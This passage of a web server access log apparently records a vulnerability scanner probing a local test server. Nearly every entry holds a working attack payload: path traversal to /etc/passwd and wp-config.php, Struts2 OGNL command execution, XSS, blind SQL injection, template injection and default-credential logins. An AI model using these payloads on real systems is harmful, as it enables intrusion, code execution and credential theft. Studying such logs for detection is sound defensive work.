5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /super/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email/unsubscribed?email=test@gmail.com%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"\x221\x22:1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/index.php/home/file/user_pics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /installer-log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"user=root&password=calvin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /data/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"j_username=weblogic&j_password=weblogic123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin//phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zm/?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('297MTuZHpG7RpHRmRH3RM2QgAKZ')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hub/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"_charset_=utf-8&j_username=anonymous&j_password=anonymous&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapi/v1/system/accountmanage/account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('297MTuZHpG7RpHRmRH3RM2QgAKZ')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"_charset_=utf-8&j_username=jdoe@geometrixx.info&j_password=jdoe&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:http://www.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.222","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:08 